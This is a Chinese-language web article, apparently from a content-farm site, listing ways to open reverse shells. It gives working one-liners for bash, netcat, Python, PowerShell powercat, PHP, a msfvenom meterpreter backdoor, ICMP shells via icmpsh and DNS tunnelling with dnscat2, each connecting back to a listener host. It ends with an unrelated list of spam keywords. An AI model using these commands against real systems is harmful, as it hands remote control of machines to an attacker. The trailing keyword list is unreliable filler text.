反弹shell有哪些
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。1.bash反弹bash -i >& /dev/tcp/ip_addr
千家信息网最后更新 2025年12月01日反弹shell有哪些
这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444
3.python
import socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "192.168.2.130" , 4444 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ "/bin/bash" , "-i" ])
4.powercat
Import-Module .\powercat.ps1powercat -c 192.168.2.130 -p 4444 -e cmd.exe
5.msf生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
6.php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'7.ICMP
关闭icmp响应,不然shell一直跳,恢复是0sysctl -w net.ipv4.icmp_echo_ignore_all=1python icmpsh_m.py 源 目标python icmpsh_m.py 192.168.2.137 192.168.2.135
在windows7运行:
icmpsh.exe -t 192.168.2.137

8.DNS
https://downloads.skullsecurity.org/dnscat2/
这里我们使用dnscat2,这里是下载的,分为windows和linux版本,服务端和客户端。
并且推荐使用vs2008编译
安装
git clone https://github.com/iagox86/dnscat2.gitcd dnscat2cd serversudo gem install bundlerbundle installsudo ruby ./dnscat2.rb
kali
ruby dnscat2.rb --dns host=0.0.0.0,port=53531ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)ruby dnscat2.rb xxx.com
windows7中:
./dnscat --dns server=192.168.2.130,port=53531./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)./dnscat xxx.com
连接成功后
查看记录
选择连接
使用shell
返回选择shell
执行命令
其他命令
quit (退出控制台)kill(中断通道)set(设值,比如设置security=open)windows(列举出所有的通道)window -i (连接某个通道)连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):clear(清屏)delay(修改远程会话超时时间)exec(执行远程机上的程序)shell(得到一个反弹shell)download/upload(两端之间上传下载文件)supend(返回到上一层,等于快捷键ctrl+z)
DNS隧道转发
listen 127.0.0.1:6666 192.168.2.135:80本机的6666就可以访问80端口
关于"反弹shell有哪些"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
命令
通道
篇文章
密钥
更多
选择
不错
实用
成功
上传下载
两端
之间
内容
单个
后跟
后门
客户
客户端
快捷键
控制台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
核心网协议软件开发
下载手机网络安全防火墙官方
怎样修改数据库字符编码
闵行区新型网络技术工业化
武汉警示教育体验中心软件开发
宜宾软件开发公司明细
深圳数应程软件开发有限公司
国际植物学名发表的登记数据库
数据库用户名无法删除
我们有网络根服务器吗
服务器数据安全措施
体育 软件开发
一路通交通事故管理系统服务器
互联网融通科技产业创建
深圳市中华网络技术有限公司
mysql数据库源怎么配置
娱乐世界北京网络技术
年度网络安全大会
防城港电商软件开发
移动支付网络安全研究意义
软件开发培训哪家产品较好
达芬奇数据库版链接
软件开发行业怎么加班
武汉易首游网络技术
爱如生四库系列数据库
迅游科技工业互联网顶级节点
tls安全连接到服务器
数据库连接池怎么使用
中组部组干学院网络安全招标
北京昊识网络技术有限公司